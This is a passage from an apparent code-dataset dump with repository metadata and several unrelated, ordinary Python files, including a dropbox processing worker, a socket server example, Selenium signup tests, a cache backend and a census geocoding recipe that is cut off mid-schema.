| 39.430868 | 273 | 0.544157 | 2,929 | 24,526 | 4.504268 | 0.185388 | 0.002577 | 0.017055 | 0.009551 | 0.207004 | 0.162056 | 0.12355 | 0.103388 | 0.103388 | 0.103388 | 0 | 0.029365 | 0.304371 | 24,526 | 621 | 274 | 39.494364 | 0.743919 | 0.049865 | 0 | 0.187891 | 0 | 0.016701 | 0.276007 | 0.011802 | 0 | 0 | 0.002772 | 0 | 0 | 0 | null | null | 0 | 0.022965 | null | null | 0.093946 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a4f1604ce9428d0115f6455fe8e1046bdd00fa11 | 5,910 | py | Python | application/briefkasten/commands.py | tomster/briefkasten | 8de5eccd258b6f8c5884cf24596469389ffa48ff | [
"BSD-3-Clause"
] | 1 | 2019-01-21T12:41:40.000Z | 2019-01-21T12:41:40.000Z | application/briefkasten/commands.py | tomster/briefkasten | 8de5eccd258b6f8c5884cf24596469389ffa48ff | [
"BSD-3-Clause"
] | 1 | 2017-12-27T18:13:30.000Z | 2018-01-26T11:44:35.000Z | application/briefkasten/commands.py | tomster/briefkasten | 8de5eccd258b6f8c5884cf24596469389ffa48ff | [
"BSD-3-Clause"
] | null | null | null | import click
from os import path, listdir, rename, remove
from datetime import datetime
from sys import exit
from multiprocessing import Pool
from signal import signal, SIGINT
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
from threading import Condition
from .dropbox import DropboxContainer
class MyHandler(FileSystemEventHandler):
def __init__(self, main_loop_cond):
self.main_loop_cond = main_loop_cond
def on_modified(self, event):
self.main_loop_cond.acquire()
self.main_loop_cond.notify()
self.main_loop_cond.release()
def keyboard_interrupt_handler(signal, frame):
print 'Caught keyboard interrupt. Exit.'
exit(0)
def run_watchdog():
# once a day we should scan for old drop boxes
# at noon we should test pgp keys
# also: scan for and clean up watchdog entries
pass
def process_drop(drop):
try:
rename(
path.join(drop.container.fs_submission_queue, drop.drop_id),
path.join(drop.container.fs_scratch, drop.drop_id)
)
except:
return
drop.process()
# remove token from scratch dir, we're done
remove(path.join(drop.container.fs_scratch, drop.drop_id))
@click.command(help='performs sanity and config checks and cleans up old drops')
@click.option(
'--root',
'-r',
default='var/drop_root/',
help='''location of the dropbox container directory''')
def janitor(root): # pragma: no cover
drop_root = root = DropboxContainer(root=root)
# Scan pub keys for expired or soon to expired ones
allkeys = root.gpg_context.list_keys()
now = datetime.utcnow()
report = ''
for editor in drop_root.settings['editors']:
key = [k for k in allkeys if editor in ', '.join(k['uids'])]
if not bool(key):
report = report + 'Editor %s does not have a public key in keyring.\n' % editor
continue
key = key[0]
if not key.get('expires'):
report = report + 'Editor %s has a key that never expires.\n' % editor
continue
keyexpiry = datetime.utcfromtimestamp(int(key['expires']))
delta = keyexpiry - now
if delta.days < 0:
report = report + 'Editor %s has an expired key.\n' % editor
elif delta.days < 60:
report = report + 'Editor ' + editor + ' has a key that will expire in %d days.\n' % delta.days
for drop in drop_root:
age = now - drop.last_changed()
max_age = 365 if not drop.from_watchdog else 1
if age.days > max_age:
if not drop.from_watchdog:
print('drop %s is expired. Removing it.' % drop)
drop.destroy()
@click.command(help='debug processing of drops')
@click.option(
'--root',
'-r',
default='var/drop_root/',
help='''location of the dropbox container directory''')
@click.argument(
'drop_id',
required=False,
default=None,
)
def debug(root, drop_id=None): # pragma: no cover
drop_root = root = DropboxContainer(root=root)
if drop_id is not None:
drops = [drop_root.get_dropbox(drop_id)]
else:
drops = drop_root
for drop in drops:
print('debugging %s' % drop)
if drop.status_int == 20:
drop.process()
@click.command(help='Scans dropbox submission directory for unprocessed drops and processes them')
@click.option(
'--root',
'-r',
default='var/drop_root/',
help='''location of the dropbox container directory''')
def debug_worker(root): # pragma: no cover
drop_root = DropboxContainer(root=root)
while True:
for drop_id in listdir(drop_root.fs_submission_queue):
print(drop_id)
drop = drop_root.get_dropbox(drop_id)
# Only look at drops that actually are for us
if drop.status_int == 20:
process_drop(drop)
else:
print('Not processing drop %s with status %d ' % (drop.drop_id, drop.status_int))
@click.command(help='listens for changes to submission directory and processes them asynchronously')
@click.option(
'--root',
'-r',
default='var/drop_root/',
help='''location of the dropbox container directory''')
@click.option(
'--async/--no-async',
default=True,
help='''process asynchronously''')
def worker(root, async=True): # pragma: no cover
drop_root = DropboxContainer(root=root)
settings = drop_root.settings
# Setup multiprocessing pool with that amount of workers as
# implied by the amount of worker jails
if async:
workers = Pool(processes=settings.get('num_workers', 1))
# Setup the condition object that we will wait for, it
# signals changes in the directory
condition = Condition()
# Setup and run the actual file system event watcher
event_handler = MyHandler(condition)
observer = Observer()
observer.schedule(event_handler, drop_root.fs_submission_queue, recursive=False)
observer.start()
signal(SIGINT, keyboard_interrupt_handler)
# grab lock, scan submission dir for jobs and process them
condition.acquire()
while True:
for drop_id in listdir(drop_root.fs_submission_queue):
print(drop_id)
drop = drop_root.get_dropbox(drop_id)
# Only look at drops that actually are for us
if drop.status_int == 20:
# process drops without attachments synchronously
if async and drop.num_attachments > 0:
workers.map_async(process_drop, [drop])
else:
process_drop(drop)
else:
print('Not processing drop %s with status %d ' % (drop.drop_id, drop.status_int))
# Wait for directory content to change
condition.wait()
condition.release()
| 30.942408 | 107 | 0.642978 | 768 | 5,910 | 4.830729 | 0.277344 | 0.038814 | 0.019407 | 0.021563 | 0.330458 | 0.289757 | 0.281132 | 0.281132 | 0.256873 | 0.208895 | 0 | 0.003895 | 0.261421 | 5,910 | 190 | 108 | 31.105263 | 0.846048 | 0.125888 | 0 | 0.350365 | 0 | 0 | 0.175087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.007299 | 0.072993 | null | null | 0.051095 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a4fdfb3a84f9a4748985f013f6aacec4b99c4f66 | 959 | py | Python | examples/basicServer.py | lwahlmeier/python-litesockets | 2d057e171ac56271c2a7c4e42425b6c6d7ed7011 | [
"Unlicense"
] | 1 | 2015-03-05T04:42:30.000Z | 2015-03-05T04:42:30.000Z | examples/basicServer.py | lwahlmeier/python-litesockets | 2d057e171ac56271c2a7c4e42425b6c6d7ed7011 | [
"Unlicense"
] | 1 | 2017-06-06T15:36:21.000Z | 2019-05-29T15:07:18.000Z | examples/basicServer.py | lwahlmeier/python-litesockets | 2d057e171ac56271c2a7c4e42425b6c6d7ed7011 | [
"Unlicense"
] | null | null | null | from litesockets import SocketExecuter, TcpServer
import time
#This starts a SocketExecuter with default of 5 threads
SE = SocketExecuter()
#creates a tcpServer listening on localhost port 11882 (socket is not open yet)
server = TcpServer("localhost", 11882)
#This is ran once the far side is connected
def newConnection(client):
print "Got new TCPClient", client
#need to add the client to the SocketExecuter to be able to do anythign with it
SE.addClient(client)
client.addWrite("hello\n")
#if we wanted to check for incoming data we would add a reader to the client
time.sleep(.01)
#End the clients connection
client.end()
#We assign a fuction with 1 argument that will get a client for the server
server.onNew = newConnection
#The socket is not open, but will not yet accept anything
server.connect()
#The server will now accept clients that connect to its listen socket
SE.addServer(server)
time.sleep(100000)
| 29.96875 | 83 | 0.754953 | 149 | 959 | 4.85906 | 0.557047 | 0.022099 | 0.030387 | 0.041436 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025674 | 0.187696 | 959 | 31 | 84 | 30.935484 | 0.903723 | 0.573514 | 0 | 0 | 0 | 0 | 0.082707 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.142857 | null | null | 0.071429 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3507ca02ee239037d5eef8f695a0bc5d29d25160 | 2,001 | py | Python | mathplotlib/calculate_polygon_area.py | ronistiawan/python-scripts | fa2fa0215d753f1eb2c5e1ce98a8f2f2eaaa8eef | [
"MIT"
] | null | null | null | mathplotlib/calculate_polygon_area.py | ronistiawan/python-scripts | fa2fa0215d753f1eb2c5e1ce98a8f2f2eaaa8eef | [
"MIT"
] | null | null | null | mathplotlib/calculate_polygon_area.py | ronistiawan/python-scripts | fa2fa0215d753f1eb2c5e1ce98a8f2f2eaaa8eef | [
"MIT"
] | null | null | null | from PIL import Image
import numpy as np
from matplotlib.path import Path
import matplotlib.pyplot as plt
import matplotlib.patches as patches
image = Image.open('samp3.png', 'r') #read image
image = image.convert('L') #convert image to greyscale
data = np.asarray(image) #convert image to numpy array
n_rows = len(data)
n_columns = len(data[0])
point = []
#-------------------------- * Draw Point *-------------------------
def drawCircle(x,y):
global ax
circle = patches.Circle((x,y), 2, lw=1, ls='-', fill=True, color='red')
ax.add_patch(circle)
plt.draw()
return ax
#-------------------------- * Draw Polygon and calculate average of pixel values *------
def drawPolygon(p):
global point
line = patches.Polygon(point, lw=1, ls='-', fill=False, color='red')
ax.add_line(line)
plt.draw()
p = Path(point)
total = 0
n = 0
for i in range(0,n_rows):
for j in range(0, n_columns):
if(p.contains_point([i,j])):
total += data[i][j]
n += 1
print("Average pixel values in the Polygon = "+ str(total/n))
#----------------------------- * On click event * --------------------------
def onclick(event):
global xc, yc
global ax, patches
global point
x, y = event.xdata, event.ydata
#stop listening if user click on top left corner
if event.dblclick:
drawPolygon(point)
fig.canvas.mpl_disconnect(cid)
#print("stoped listening for events")
else:
point.append([x,y])
print 'added vertice : (%d,%d)' %(x, y)
drawCircle(x,y)
return point
#-------------------------------------------------------------------------
fig,ax = plt.subplots(1)
ax.imshow(data, cmap='gray')
cid = fig.canvas.mpl_connect('button_press_event', onclick)
print("start listening for mouse clicks ... click on top left corner to stop listening")
plt.show()
plt.draw() | 27.791667 | 88 | 0.541229 | 258 | 2,001 | 4.155039 | 0.422481 | 0.011194 | 0.026119 | 0.016791 | 0.037313 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007256 | 0.242379 | 2,001 | 72 | 89 | 27.791667 | 0.699868 | 0.223888 | 0 | 0.1 | 0 | 0 | 0.117152 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.1 | null | null | 0.06 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
35150cb503f38ff16ebcf6a4b42f07d3240178e6 | 409 | py | Python | src/reducer/bohm_debug.py | fritzo/pomagma | 224bb6adab3fc68e2d853e6365b4b86a8f7f468f | [
"Apache-2.0"
] | 10 | 2015-06-09T00:25:01.000Z | 2019-06-11T16:07:31.000Z | src/reducer/bohm_debug.py | fritzo/pomagma | 224bb6adab3fc68e2d853e6365b4b86a8f7f468f | [
"Apache-2.0"
] | 25 | 2015-03-23T23:16:01.000Z | 2017-08-29T03:35:59.000Z | src/reducer/bohm_debug.py | fritzo/pomagma | 224bb6adab3fc68e2d853e6365b4b86a8f7f468f | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import os
os.environ['POMAGMA_LOG_LEVEL'] = '3'
from pomagma.compiler.util import temp_memoize # isort:skip
from pomagma.reducer import bohm # isort:skip
print('Example 1.')
with temp_memoize():
bohm.sexpr_simplify('(ABS (ABS (1 0 (1 0))) (ABS (ABS (1 (0 0)))))')
print('Example 2.')
with temp_memoize():
bohm.sexpr_simplify('(ABS (ABS (0 1 1)) (ABS (ABS (1 (0 0)))))')
| 21.526316 | 72 | 0.655257 | 67 | 409 | 3.895522 | 0.432836 | 0.091954 | 0.08046 | 0.091954 | 0.360153 | 0.291188 | 0.291188 | 0.291188 | 0 | 0 | 0 | 0.046512 | 0.158924 | 409 | 18 | 73 | 22.722222 | 0.712209 | 0.102689 | 0 | 0.2 | 0 | 0.1 | 0.340659 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.3 | 0 | 0.3 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3517beedd46a5471e67dd32647db03c5051f3de7 | 5,038 | py | Python | scripts/selenium/test.py | Mlrobinson1993/trustroots | cecda00742896bba45276fc2095492ff5aebe25d | [
"MIT"
] | 377 | 2015-01-06T11:27:43.000Z | 2022-03-15T04:17:06.000Z | scripts/selenium/test.py | Mlrobinson1993/trustroots | cecda00742896bba45276fc2095492ff5aebe25d | [
"MIT"
] | 1,239 | 2015-01-01T14:05:18.000Z | 2022-03-30T06:00:39.000Z | scripts/selenium/test.py | Mlrobinson1993/trustroots | cecda00742896bba45276fc2095492ff5aebe25d | [
"MIT"
] | 176 | 2015-01-04T13:51:28.000Z | 2022-03-30T19:49:54.000Z | #!/usr/bin/env python
from browsers import browsers
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.support.wait import WebDriverWait
from selenium.common.exceptions import TimeoutException
import time
import sys
import re
import signal
print 'Trustroots Selenium tests'
# URL is passed as an argument
if len(sys.argv) > 1:
test_url = sys.argv[1]
# Default to localhost
else:
test_url = 'http://localhost:3000/'
print 'Testing URL: ' + test_url
class Main:
def __init__(self):
try:
from config_browserstack import browserstack_url
no_browserstack = 0
except ImportError:
no_browserstack = 1
no_browserstack = 1
for cap in browsers:
if cap['env'] == 'remote' and no_browserstack:
if no_browserstack == 1:
print 'sorry, no browserstack'
no_browserstack = 2 # Should be cleaner
else:
if cap['env'] == 'local':
driver = getattr(webdriver, cap['browser'])()
else:
print 'launching', cap
driver = webdriver.Remote(
command_executor=browserstack_url,
desired_capabilities=cap
)
try:
self.t = TestSuite(driver, cap, test_url)
except:
print sys.exc_info()
finally:
if cap['env'] == 'remote':
driver.quit()
class TestSuite:
def __init__(self, driver, cap, url):
self.wait = WebDriverWait(driver, 15)
self.driver = driver
self.cap = cap
self.url = url
def signal_handler(signal, frame):
print('Handling Ctrl+C!')
if hasattr(self, 'driver') and self.driver:
print 'Trying driver.quit()'
self.driver.quit()
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
try:
self.run_tests()
except:
print cap
print sys.exc_info()
def run_tests(self):
self.username = 'tester' + str(time.time())[5:10]
self.email = self.username + '@example.tld'
self.password = 'Tester123'
self.driver.get(self.url)
self.test_signup()
self.test_home_map()
self.test_logout_signin()
self.test_logout_signin_email()
def test_signup(self):
if not "Trustroots" in self.driver.title:
raise Exception("Unable to load page!")
self._wait_and_click(self.driver.find_element_by_css_selector, 'a.btn-home-signup')
if not 'Trustroots' in self.driver.title:
raise Exception("Unable to load page!")
self._wait_and_click(self.driver.find_element_by_id, 'firstName')
self.driver.find_element_by_id('firstName').send_keys('Tester')
self.driver.find_element_by_id('lastName').send_keys('Tester')
self.driver.find_element_by_id('username').send_keys(self.username)
self.driver.find_element_by_id('email').send_keys(self.email)
self.driver.find_element_by_id('password').send_keys(self.password)
self._wait_and_click(self.driver.find_element_by_css_selector, 'button[type="submit"]')
self._wait_and_click(self.driver.find_element_by_id, 'signup-edit')
def test_logout_signin(self):
self.driver.get(self.url + 'auth/signout')
self._wait_and_click(self.driver.find_element_by_css_selector, 'a.btn-home-login')
self.driver.find_element_by_id('username').send_keys(self.username)
self.driver.find_element_by_id('password').send_keys(self.password)
self._wait_and_click(self.driver.find_element_by_css_selector, 'button[type="submit"]')
def test_logout_signin_email(self):
self.driver.get(self.url + 'auth/signout')
self._wait_and_click(self.driver.find_element_by_css_selector, 'a.btn-home-login')
self.driver.find_element_by_id('username').send_keys(self.email)
self.driver.find_element_by_id('password').send_keys(self.password)
self._wait_and_click(self.driver.find_element_by_css_selector, 'button[type="submit"]')
def test_home_map(self):
self._wait_and_click(self.driver.find_element_by_css_selector, 'a.navbar-brand')
self.driver.find_element_by_id('search-query').send_keys('Berlin' + Keys.RETURN)
def _assert_contains_regexp(self, regexp):
text_found = re.search(regexp, self.driver.page_source)
print text_found
assert text_found != None
def _wait_and_click_id(self, _id, pause=0):
self._wait_and_click(self.driver.find_element_by_id, _id, pause)
def _wait_and_click(self, func, param, pause=0):
if pause == 0:
self.wait.until(lambda _: func(param).is_displayed())
else:
self._sleep(pause)
func(param).click()
m = Main()
| 33.812081 | 95 | 0.645693 | 647 | 5,038 | 4.761978 | 0.236476 | 0.100617 | 0.09088 | 0.136319 | 0.409607 | 0.403116 | 0.395002 | 0.381045 | 0.381045 | 0.363843 | 0 | 0.006061 | 0.246725 | 5,038 | 148 | 96 | 34.040541 | 0.805797 | 0.017467 | 0 | 0.236842 | 0 | 0 | 0.105742 | 0.012738 | 0 | 0 | 0 | 0 | 0.017544 | 0 | null | null | 0.035088 | 0.105263 | null | null | 0.087719 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
352346172d80e787c3629f02731d55869cb32f15 | 2,223 | py | Python | main.py | Knysliux001/pocker | d7f6685db8db407b4f93ea330b9568f1dae39b90 | [
"MIT"
] | null | null | null | main.py | Knysliux001/pocker | d7f6685db8db407b4f93ea330b9568f1dae39b90 | [
"MIT"
] | null | null | null | main.py | Knysliux001/pocker | d7f6685db8db407b4f93ea330b9568f1dae39b90 | [
"MIT"
] | null | null | null | # import random
#
# deck = list()
# for suit in ["♦", "♥", "♠", "♣"]:
# for value in ["A", "K", "Q", "J", "10", "9", "8", "7", "6", "5", "4", "3", "2"]:
# deck.append((value, suit))
# r_sample = random.sample(deck, 7)
# print(r_sample)
from enum import Enum, auto, unique
class Suit(Enum):
HEARTS = "♥"
DIAMONDS = "♦"
CLUBS = "♣"
SPADES = "♠"
class CardRank(Enum):
TWO = auto()
THREE = auto()
FOUR = auto()
FIVE = auto()
SIX = auto()
SEVEN = auto()
EIGHT = auto()
NINE = auto()
TEN = auto()
JACK = auto()
QUEEN = auto()
KING = auto()
AXE = auto()
class HandRank(Enum):
HIGHEST_CARD = auto()
PAIR = auto()
TWO_PAIRS = auto()
THREE = auto()
STRAIGHT = auto()
FLUSH = auto()
FULL_HOUSE = auto()
FOUR = auto()
STRAIGHT_FLUSH = auto()
ROYAL_FLUSH = auto()
class Card():
def __init__(self, value, suit):
self.__value = value
self.__suit = suit
def getValue(self):
return self.__value
def __str__(self):
pass
def __eq__(self, card2):
return self.__value.value == card2.getValue().value
def __lt__(self, card2):
return self.__value.value < card2.getValue().value
class Player(Card):
def __init__(self, name):
self.__name = name
self.__hand = []
def getName(self):
return self.__name
def receiveCard(self, new_card):
if isinstance(new_card, Card):
self.__hand.append(new_card)
def showHand(self):
hand_str = []
for card in self.__hand:
hand_str.append(card)
print(hand_str)
card1 = Card(CardRank.FIVE, Suit.SPADES)
card2 = Card(CardRank.SEVEN, Suit.CLUBS)
card3 = Card(CardRank.AXE, Suit.CLUBS)
card4 = Card(CardRank.FIVE, Suit.SPADES)
card5 = Card(CardRank.SEVEN, Suit.CLUBS)
card6 = Card(CardRank.AXE, Suit.CLUBS)
card7 = Card(CardRank.AXE, Suit.CLUBS)
l = [card1, card2, card3, card4, card5, card6, card7]
print(l)
print(card1 < card3)
| 21.375 | 87 | 0.525416 | 264 | 2,223 | 4.253788 | 0.333333 | 0.0748 | 0.0374 | 0.050757 | 0.240427 | 0.083704 | 0.083704 | 0.083704 | 0.083704 | 0 | 0 | 0.020847 | 0.331084 | 2,223 | 103 | 88 | 21.582524 | 0.728985 | 0.103914 | 0 | 0.059701 | 0 | 0 | 0.002136 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.134328 | false | 0.014925 | 0.014925 | 0.059701 | 0.686567 | 0.044776 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
352401392d56cb0110d7577485af9d192f7adefa | 615 | py | Python | fclib/tests/test_dcnn.py | barrosm/forecasting | 86b421b71826b92e47c3e3cb6cdcbf7ff4a63b90 | [
"MIT"
] | 2,276 | 2020-04-07T17:38:30.000Z | 2022-03-30T12:24:55.000Z | fclib/tests/test_dcnn.py | barrosm/forecasting | 86b421b71826b92e47c3e3cb6cdcbf7ff4a63b90 | [
"MIT"
] | 31 | 2020-04-10T21:25:18.000Z | 2022-02-10T01:17:19.000Z | fclib/tests/test_dcnn.py | barrosm/forecasting | 86b421b71826b92e47c3e3cb6cdcbf7ff4a63b90 | [
"MIT"
] | 401 | 2020-04-07T18:52:22.000Z | 2022-03-29T04:26:29.000Z | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
from fclib.models.dilated_cnn import create_dcnn_model
def test_create_dcnn_model():
mod0 = create_dcnn_model(seq_len=1) # default args
assert mod0 is not None
mod1 = create_dcnn_model(
seq_len=1, n_dyn_fea=1, n_outputs=2, n_dilated_layers=1, kernel_size=2, dropout_rate=0.05, max_cat_id=[30, 120]
)
assert mod1 is not None
mod2 = create_dcnn_model(
seq_len=1, n_dyn_fea=1, n_outputs=2, n_dilated_layers=2, kernel_size=2, dropout_rate=0.05, max_cat_id=[30, 120]
)
assert mod2 is not None
| 30.75 | 119 | 0.720325 | 107 | 615 | 3.831776 | 0.457944 | 0.121951 | 0.182927 | 0.131707 | 0.526829 | 0.526829 | 0.473171 | 0.473171 | 0.473171 | 0.473171 | 0 | 0.066132 | 0.188618 | 615 | 19 | 120 | 32.368421 | 0.755511 | 0.131707 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.083333 | false | 0 | 0.083333 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
352b63d351b0fa1ec394f4c8e0212687ff1e36ed | 3,290 | py | Python | oslo_cache/backends/dictionary.py | mail2nsrajesh/oslo.cache | f288eae21f625b9bb5063f525fcc18014848a64f | [
"Apache-2.0"
] | 29 | 2015-04-26T16:05:14.000Z | 2021-12-31T15:03:19.000Z | oslo_cache/backends/dictionary.py | mail2nsrajesh/oslo.cache | f288eae21f625b9bb5063f525fcc18014848a64f | [
"Apache-2.0"
] | null | null | null | oslo_cache/backends/dictionary.py | mail2nsrajesh/oslo.cache | f288eae21f625b9bb5063f525fcc18014848a64f | [
"Apache-2.0"
] | 19 | 2015-06-15T23:51:10.000Z | 2020-12-10T00:03:21.000Z | # Copyright 2015 Mirantis Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""dogpile.cache backend that uses dictionary for storage"""
from dogpile.cache import api
from oslo_cache import core
from oslo_utils import timeutils
__all__ = [
'DictCacheBackend'
]
_NO_VALUE = core.NO_VALUE
class DictCacheBackend(api.CacheBackend):
"""A DictCacheBackend based on dictionary.
Arguments accepted in the arguments dictionary:
:param expiration_time: interval in seconds to indicate maximum
time-to-live value for each key in DictCacheBackend.
Default expiration_time value is 0, that means that all keys have
infinite time-to-live value.
:type expiration_time: real
"""
def __init__(self, arguments):
self.expiration_time = arguments.get('expiration_time', 0)
self.cache = {}
def get(self, key):
"""Retrieves the value for a key.
:param key: dictionary key
:returns: value for a key or :data:`oslo_cache.core.NO_VALUE`
for nonexistent or expired keys.
"""
(value, timeout) = self.cache.get(key, (_NO_VALUE, 0))
if self.expiration_time > 0 and timeutils.utcnow_ts() >= timeout:
self.cache.pop(key, None)
return _NO_VALUE
return value
def get_multi(self, keys):
"""Retrieves the value for a list of keys."""
return [self.get(key) for key in keys]
def set(self, key, value):
"""Sets the value for a key.
Expunges expired keys during each set.
:param key: dictionary key
:param value: value associated with the key
"""
self.set_multi({key: value})
def set_multi(self, mapping):
"""Set multiple values in the cache.
Expunges expired keys during each set.
:param mapping: dictionary with key/value pairs
"""
self._clear()
timeout = 0
if self.expiration_time > 0:
timeout = timeutils.utcnow_ts() + self.expiration_time
for key, value in mapping.items():
self.cache[key] = (value, timeout)
def delete(self, key):
"""Deletes the value associated with the key if it exists.
:param key: dictionary key
"""
self.cache.pop(key, None)
def delete_multi(self, keys):
"""Deletes the value associated with each key in list if it exists.
:param keys: list of dictionary keys
"""
for key in keys:
self.cache.pop(key, None)
def _clear(self):
"""Expunges expired keys."""
now = timeutils.utcnow_ts()
for k in list(self.cache):
(_value, timeout) = self.cache[k]
if timeout > 0 and now >= timeout:
del self.cache[k]
| 30.747664 | 75 | 0.640426 | 439 | 3,290 | 4.715262 | 0.316629 | 0.03913 | 0.034783 | 0.017391 | 0.15942 | 0.078261 | 0.035749 | 0 | 0 | 0 | 0 | 0.006268 | 0.272644 | 3,290 | 106 | 76 | 31.037736 | 0.858755 | 0.491185 | 0 | 0.076923 | 0 | 0 | 0.021204 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.205128 | false | 0 | 0.076923 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
35307980268b82f9e8f16546c421f49a138ad4df | 7,477 | py | Python | census-us/custom-recipes/address-batch-geocoder-us-census-geo/recipe.py | RedaAffane/dataiku-contrib | d409ddc25d31570972a14abb19a84ac101afc6cc | [
"Apache-2.0"
] | null | null | null | census-us/custom-recipes/address-batch-geocoder-us-census-geo/recipe.py | RedaAffane/dataiku-contrib | d409ddc25d31570972a14abb19a84ac101afc6cc | [
"Apache-2.0"
] | null | null | null | census-us/custom-recipes/address-batch-geocoder-us-census-geo/recipe.py | RedaAffane/dataiku-contrib | d409ddc25d31570972a14abb19a84ac101afc6cc | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import dataiku
import pandas as pd, numpy as np
from dataiku import pandasutils as pdu
import requests
#import time
from dataiku.customrecipe import *
import sys
import re
import geocoder_utils
import common
import os
logging.info('1/6 Creating base folder...' )
path_datadir_tmp = dataiku.get_custom_variables()["dip.home"] + '/tmp/'
P_CENSUS_CONTENT = 'geocoder'
FOLDER_NAME = 'tmp_census_us_'+ P_CENSUS_CONTENT
common.create_folder(path_datadir_tmp,FOLDER_NAME,True)
input_name = get_input_names_for_role('input')[0]
output_ = get_output_names_for_role('output')[0]
output_dataset = dataiku.Dataset(output_)
P_COL_STREET = get_recipe_config()['p_col_street']
P_COL_CITY = get_recipe_config()['p_col_city']
P_COL_STATE = get_recipe_config()['p_col_state']
P_COL_ZIPCODE = get_recipe_config()['p_col_zipcode']
P_BENCHMARK = get_recipe_config()['p_benchmark']
P_VINTAGE = get_recipe_config()['p_vintage']
if P_BENCHMARK=="9":
P_VINTAGE ="910"
logging.info('2/6 Parameters:')
logging.info('[+] BENCHMARK = {} ; VINTAGE = {} '.format(P_BENCHMARK,P_VINTAGE))
P_BATCH_SIZE_UNIT = int(get_recipe_config()['param_batch_size'])
if P_BATCH_SIZE_UNIT is None:
P_BATCH_SIZE_UNIT = 5000
id_column = get_recipe_config()['p_col_id_column']
id_as_int = get_recipe_config()['param_id_as_int']
P_KEEP_NON_MATCHING = get_recipe_config()['param_keep_non_matching']
#P_RETRY_TIE = True #get_recipe_config()['param_retry_tie'] ### Potential optimization by resubmitting the ties.
in_cols = [id_column,P_COL_STREET,P_COL_CITY,P_COL_STATE,P_COL_ZIPCODE]
if id_as_int:
id_type='int'
else:
id_type='string'
logging.info('3/6 Input columns:')
logging.info(in_cols)
schema = [{'name':id_column,'type':id_type}
,{'name':'street','type':'string'}
,{'name':'city','type':'string'}
,{'name':'state','type':'string'}
,{'name':'zipcode','type':'string'}
,{'name':'match','type':'string'}
,{'name':'match_quality','type':'string'}
,{'name':'matched_address','type':'string'}
,{'name':'matched_state','type':'string'}
,{'name':'matched_city','type':'string'}
,{'name':'matched_zipcode','type':'string'}
